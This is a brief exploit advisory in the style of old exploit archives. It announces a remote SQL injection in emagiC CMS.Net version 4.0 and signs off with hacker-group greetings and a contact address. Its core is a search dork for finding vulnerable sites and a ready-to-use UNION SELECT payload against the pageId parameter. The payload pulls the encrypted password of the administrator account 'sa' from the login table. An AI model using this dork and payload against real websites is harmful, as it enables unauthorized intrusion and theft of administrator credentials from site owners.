emagiC CMS.NET version 4.0 suffers from a remote SQL injection vulnerability.
8a181bfc9e06840ffc2b5f3b2dd5b7cf282541bfd6f1e7cc7def8a1a4edf5229
--------------------
emagiC CMS.Net v4.0 Remote SQL Injection Exploit
--------------------
+ Found : hak3r-b0y
+ Gr33tz : darko , V4 CrackerS , hacker_alQassam , Ans , Barra, all ans-hacker.com members
+ Script URL : http://www.emagic-cms.com/
+ D0rk : inurl:emc.asp?pageid=
--------------------
Exploit:
emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username='sa'--
y0u will find the crypted password
for the admin 'sa'
--------------------
ContacT: mohamed_amine_1991@hotmail.com
--------------------